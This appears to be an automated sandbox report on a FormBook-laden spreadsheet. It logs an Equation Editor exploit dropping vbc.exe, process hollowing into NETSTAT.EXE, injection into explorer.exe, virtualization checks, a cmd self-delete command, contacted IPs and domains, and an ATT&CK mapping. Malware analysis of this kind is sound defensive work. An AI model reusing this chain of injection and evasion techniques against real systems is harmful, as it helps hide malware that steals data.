          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFF34 NtQueueApcThread,7_2_022EFF34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFFFC NtCreateProcessEx,7_2_022EFFFC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFC30 NtOpenProcess,7_2_022EFC30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFC48 NtSetInformationFile,7_2_022EFC48
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F0C40 NtGetContextThread,7_2_022F0C40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFC90 NtUnmapViewOfSection,7_2_022EFC90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022EFD5C NtEnumerateKey,7_2_022EFD5C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022F1D80 NtSuspendThread,7_2_022F1D80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_000985E0 NtCreateFile,7_2_000985E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00098690 NtReadFile,7_2_00098690
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00098710 NtClose,7_2_00098710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_000987C0 NtAllocateVirtualMemory,7_2_000987C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0009868A NtReadFile,7_2_0009868A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0009870A NtClose,7_2_0009870A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_000987BB NtAllocateVirtualMemory,7_2_000987BB
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: PO5594.xlsxVirustotal: Detection: 32%
          Source: PO5594.xlsxReversingLabs: Detection: 29%
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO5594.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDA57.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/20@4/5
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402053 CoCreateInstance,MultiByteToWideChar,4_2_00402053
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_00404292
          Source: PO5594.xlsxJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: netstat.pdb source: vbc.exe, 00000005.00000002.507848304.00000000004C9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE
          Source: C:\Users\Public\vbc.exeCode function: 4_2_730591B5 push ecx; ret 4_2_730591C8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B822 push eax; ret 5_2_0041B828
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B82B push eax; ret 5_2_0041B892
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B88C push eax; ret 5_2_0041B892
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181F3 push es; ret 5_2_004181FA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004153B2 push 36635107h; retf 5_2_004153B7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7D5 push eax; ret 5_2_0041B828
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075DFA1 push ecx; ret 5_2_0075DFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181F3 push es; ret 5_1_004181FA
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004153B2 push 36635107h; retf 5_1_004153B7
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B7D5 push eax; ret 5_1_0041B828
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B822 push eax; ret 5_1_0041B828
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B82B push eax; ret 5_1_0041B892
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B88C push eax; ret 5_1_0041B892
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022FDFA1 push ecx; ret 7_2_022FDFB4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0009C076 push ss; ret 7_2_0009C080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_000981F3 push es; ret 7_2_000981FA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_000953B2 push 36635107h; retf 7_2_000953B7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0009C546 push cs; iretd 7_2_0009C547
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0009B7D5 push eax; ret 7_2_0009B828
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0009B82B push eax; ret 7_2_0009B892
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0009B822 push eax; ret 7_2_0009B828
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0009B88C push eax; ret 7_2_0009B892
          Source: vbc.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x4c259
          Source: xggenq.dll.4.drStatic PE information: real checksum: 0x1f5f8 should be: 0x23b20
          Source: vbc[1].exe.2.drStatic PE information: real checksum: 0x0 should be: 0x4c259
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nskF049.tmp\xggenq.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2596Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 2736Thread sleep time: -34000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088D0 rdtsc 5_2_004088D0
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E93 FindFirstFileA,FindClose,4_2_00405E93
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_004054BD
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402671 FindFirstFileA,4_2_00402671
          Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.489929362.000000000456F000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.545549121.000000000449C000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.473795632.00000000004F4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.498055259.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.484915652.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.482100672.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73057B03 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_73057B03
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73057B03 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_73057B03
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73055990 ksurfviwic,GetProcessHeap,RtlAllocateHeap,VirtualProtect,4_2_73055990
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088D0 rdtsc 5_2_004088D0
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73066402 mov eax, dword ptr fs:[00000030h]4_2_73066402
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73066706 mov eax, dword ptr fs:[00000030h]4_2_73066706
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73066744 mov eax, dword ptr fs:[00000030h]4_2_73066744
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73066616 mov eax, dword ptr fs:[00000030h]4_2_73066616
          Source: C:\Users\Public\vbc.exeCode function: 4_2_730666C7 mov eax, dword ptr fs:[00000030h]4_2_730666C7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007626F8 mov eax, dword ptr fs:[00000030h]5_2_007626F8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022E0080 mov ecx, dword ptr fs:[00000030h]7_2_022E0080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_022E00EA mov eax, dword ptr fs:[00000030h]7_2_022E00EA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_023026F8 mov eax, dword ptr fs:[00000030h]7_2_023026F8
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B40 LdrLoadDll,5_2_00409B40
          Source: C:\Users\Public\vbc.exeCode function: 4_2_73058D72 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_73058D72

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.spacex-live.net
          Source: C:\Windows\explorer.exeDomain query: www.schittstore.com
          Source: C:\Windows\explorer.exeDomain query: www.metanetgateway.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.29.132.90 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.75.173 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.60.5 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.253.231 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sarahannsartstudio.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: D30000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 1764Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000000.478045052.0000000000750000.00000002.00020000.sdmp, NETSTAT.EXE, 00000007.00000002.666570815.0000000000D40000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.478045052.0000000000750000.00000002.00020000.sdmp, NETSTAT.EXE, 00000007.00000002.666570815.0000000000D40000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.478045052.0000000000750000.00000002.00020000.sdmp, NETSTAT.EXE, 00000007.00000002.666570815.0000000000D40000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_004030FB

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery151Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
